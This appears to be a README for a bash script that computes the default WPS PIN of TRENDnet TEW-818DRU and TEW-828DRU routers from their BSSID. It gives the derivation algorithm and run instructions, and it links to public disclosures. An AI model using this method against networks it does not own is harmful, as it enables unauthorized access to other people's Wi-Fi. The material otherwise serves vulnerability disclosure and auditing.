The TEW-828 DRU is the very last model from TRENDnet. It is an expensive trial-band device that can reach 3200Mbps (cumulated)
The TEW-818 DRU was launched just before the 828. It is an expensive device too with a "abgn" dual-band Technology. It can reach 1900Mbps.
The default WPS PIN for both models is generated with the six last digits from the 2.4Ghz bSSID (equal to half end of 5 GHz bSSID minus 4 )
The 2 first digits of this portion of the BSSID are inverted with the two last digits
Than the string is converted from hexadecimal to decimal.
Some zero-padding is done to get a 7 digits strings if the value obtained after conversion to decimal is inferior to 1000000. In the case that the value of the string after conversion is superior to 9999999, the first digit is removed.
At the end the string is always 7 decimal digit long in order to generate porperly a WPS checksum that is added at the end to create a 8 digit WPS PIN.
Three more elements should be pointed out :
- WPS is enabled by default
- The default PIN is unique, it is the same for 2.4 Ghz and 5 Ghz networks
- The default PIN is unconfigurable, it cannot be changed
For more details please check the original full-disclosures
- https://packetstormsecurity.com/files/132477/TRENDnet-TEW-818RDU-PIN-Disclosure.html (English) *
- https://www.wifi-libre.com/topic-160-algoritmo-pin-tew-818dru-ac1900-y-tew-828dru-ac3200-de-trendnet.html (Spanish)
- https://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html (French )
(*) There is an error in the english version, it is not tew818DRU v1 and v2 but , as it is sayed here, TEW-818DRU & TEW-828DRU
It is a very simple bash script that can be run in any GNU-Linux ditribution. No dependencies needed :
-
download and unzip this repository branch
-
locate a shell in the unziped directory with
cd -
launch the script by invoking bash
bash tdn.sh -
Introduce (as prompted in the shell) the full 2.4 Ghz BSSID in it original format ( 6 pairs of hexadecimal digits separated by two points ":" )